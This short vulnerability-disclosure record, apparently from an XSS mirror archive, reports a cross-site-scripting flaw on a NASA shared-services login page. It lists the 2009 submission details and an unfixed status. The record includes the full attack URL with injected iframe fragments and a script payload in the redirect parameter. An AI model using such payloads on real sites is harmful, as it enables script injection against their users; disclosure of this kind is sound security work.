Security researcher Mystick, has submitted on 07/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.nssc.nasa.gov, which at the time of submission ranked 840 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/01/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 07/01/2009 |
Date published: 30/01/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Mystick |
Domain: www.nssc.nasa.gov |
Category: XSS |
Pagerank: 840 |
URL: https://www.nssc.nasa.gov/portal/site/customerservice/template.LOGIN/?logon=%3Ciframe+src%3D&passwor d=%3Ciframe+src%3D&realm=realm1%3Ciframe%20src=&submit=Log+In%3Ciframe%20src=&redirectURL=%22%3Cscri pt%3Ealert(123)%3C/script%3E |
Click here to view the mirror
|
|
|